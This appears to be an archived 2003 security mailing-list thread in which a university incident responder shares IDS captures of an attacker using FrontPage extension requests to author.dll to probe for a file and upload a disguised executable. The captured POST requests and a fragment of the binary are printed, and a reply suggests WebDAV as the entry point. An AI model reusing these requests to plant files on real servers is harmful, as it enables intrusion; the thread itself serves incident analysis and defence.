Re: frontpage extensions; backdoor or initial compromise?

From: Eric Kimminau (root_at_kimminau.org)
Date: 07/03/03

  • Next message: Jordan Wiens: "RE: frontpage extensions; backdoor or initial compromise?"
    Date: Thu, 3 Jul 2003 14:05:18 -0400 (EDT)
    To: Jordan Wiens <jwiens@nersp.nerdc.ufl.edu>
    
    

    Im assuming it was WebDAV, right? Get your Windows boxes patched and
    keep close tabs on them on Sunday.

    Eric.

    On Wed, 2 Jul 2003, Jordan Wiens wrote:

    > Date: Wed, 2 Jul 2003 13:08:43 -0400 (EDT)
    > From: Jordan Wiens <jwiens@nersp.nerdc.ufl.edu>
    > To: incidents@securityfocus.com
    > Subject: frontpage extensions; backdoor or initial compromise?
    >
    > We had a recent compromise that our IDS did not detect, however, it did
    > detect subsequent backdoor activity and a few other packets afterwards
    > that alerted us to the compromise. Upon closer investigation of the
    > activity, some of the additional information logged showed some frontpage
    > extensions being used in an interesting way. Anyone else seen this?
    >
    > Since we were unable to determine the initial compromise method, I'm
    > trying to figure out if this was purely used as a backdoor, or might also
    > have been the same method as the initial compromise.
    >
    > Some additional background info; the svchost.exe is a renamed servu ftp
    > daemon process that was loaded into the server along with a few other,
    > 'normal' backdoor tools.
    >
    > --
    > Jordan Wiens
    > UF Network Incident Response Team
    > (352)392-2061
    >
    > ATTACK:
    > ---------------
    > POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
    > Date: Tue, 01 Jul 2003 20:33:10 GMT
    > MIME-Version: 1.0
    > User-Agent: MSFrontPage/4.0
    > Host: aaa.bbb.ccc.ddd
    > Accept: auth/sicily
    > Content-Length: 112
    > Content-Type: application/x-www-form-urlencoded
    > X-Vermeer-Content-Type: application/x-www-form-urlencoded
    > Connection: Keep-Alive
    > Cache-Control: no-cache
    >
    > method=getDocsMetaInfo%3a4%2e0%2e2%2e4715&url%5flist=%5bsvchost%2eexe%5d&listHiddenDocs=false&listLinkInfo=true
    >
    >
    > SERVER RESPONSE:
    > ---------------
    > HTTP/1.1 100 Continue
    > Server: Microsoft-IIS/5.0
    > Date: Tue, 01 Jul 2003 20:30:02 GMT
    >
    > HTTP/1.1 200 OK
    > Server: Microsoft-IIS/5.0
    > Date: Tue, 01 Jul 2003 20:30:02 GMT
    > Connection: close
    > Content-type: application/x-vermeer-rpc
    > X-FrontPage-User-Name: IUSR_MACHINE
    >
    > <html><head><title>vermeer RPC packet</title></head>
    > <body>
    > <p>method=getDocsMetaInfo:4.0.2.4715
    > <p>document_list=
    > <ul>
    > </ul>
    > <p>failedUrls=
    > <ul>
    > <li>svchost.exe
    > </ul>
    > </body>
    > </html>
    >
    >
    >
    > Additional session....
    >
    > ATTACKER:
    > ---------------
    > POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
    > Date: Tue, 01 Jul 2003 20:33:29 GMT
    > MIME-Version: 1.0
    > User-Agent: MSFrontPage/4.0
    > Host: aaa.bbb.ccc.ddd
    > Accept: auth/sicily
    > Content-Length: 2142969
    > Content-Type: application/x-vermeer-urlencoded
    > X-Vermeer-Content-Type: application/x-vermeer-urlencoded
    > Connection: Keep-Alive
    > Cache-Control: no-cache
    >
    >
    > SERVER:
    > ---------------
    > HTTP/1.1 100 Continue
    > Server: Microsoft-IIS/5.0
    > Date: Tue, 01 Jul 2003 20:30:21 GMT
    >
    > ATTACKER:
    > ---------------
    > method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dsvss%2eexe%3bmeta%5finfo%
    > 3d%5bvti%5fmodifiedby%3bSW%7cAdministrator%3bvti%5fauthor%3bSW%7cAdministrator%5d%5d&put%5foption=edit&comment=&keep%5fch
    > ecked%5fout=false
    > MZP@!L!This program must be run under Win32
    > $7PELW] < @p! > xp pK.text `.data@.tls*@.rdata,@P.idata
    > .@@.edataF@@.rsrcxH@@.relocp @Pfb:C++HOOK,[[#[RjYZp/jYh[j3'[jg3['[`PS
    > htM=[s
    > .
    > . Additional raw data.
    > .
    >
    > ----------------------------------------------------------------------------
    > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
    > world's premier technical IT security event! 10 tracks, 15 training sessions,
    > 1,800 delegates from 30 nations including all of the top experts, from CSO's to
    > "underground" security specialists. See for yourself what the buzz is about!
    > Early-bird registration ends July 3. This event will sell out. www.blackhat.com
    > ----------------------------------------------------------------------------
    >
    >

    ----------------------------------------------------------------------------
    Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
    world's premier technical IT security event! 10 tracks, 15 training sessions,
    1,800 delegates from 30 nations including all of the top experts, from CSO's to
    "underground" security specialists. See for yourself what the buzz is about!
    Early-bird registration ends July 3. This event will sell out. www.blackhat.com
    ----------------------------------------------------------------------------


  • Next message: Jordan Wiens: "RE: frontpage extensions; backdoor or initial compromise?"

    Relevant Pages

    • Re: Linux Kernel Hacked by NSA/GCHQ
      ... you may have noticed a huge number of port scans from China?. ... reveal more about the attacker. ... The kernel compromise I'm talking about could be very very subtle that only ... The prize for this attacker is not just a Linux server, ...
      (Fedora)
    • Re: Linux Kernel Hacked by NSA/GCHQ
      ... Let me give you another example, think back over the past few years, say even 3 years, if you check your firewall logs for any server you have install for a customer, you may have noticed a huge number of port scans from China?. ... The kernel compromise I'm talking about could be very very subtle that only provides enough information that allows the attacker to select their next subversion technique. ...
      (Fedora)
    • Re: [Full-disclosure] Packet sniffing help needed
      ... >> from relatively straightforward (compromise the target's computer ... The attacker doesn't really have to do anything ... > server compromise. ... But if the user dismisses this warning without ...
      (Full-Disclosure)
    • RE: [Full-disclosure] Packet sniffing help needed
      ... compromise of the client, the server, or any intermediate network ... I'd pinpoint DNS as one of the biggest points of vulnerability. ... >> ranging from relatively straightforward (compromise the target's ... The attacker doesn't really have to do ...
      (Full-Disclosure)
    • Re: [Full-disclosure] one of my servers has been compromized
      ... What you described is a userland rootkit detector. ... server everytime you suspect you MAY have been compromised. ... since the bot was so easy to find in the first place ... The exploit or compromise running on this system is likely ...
      (Full-Disclosure)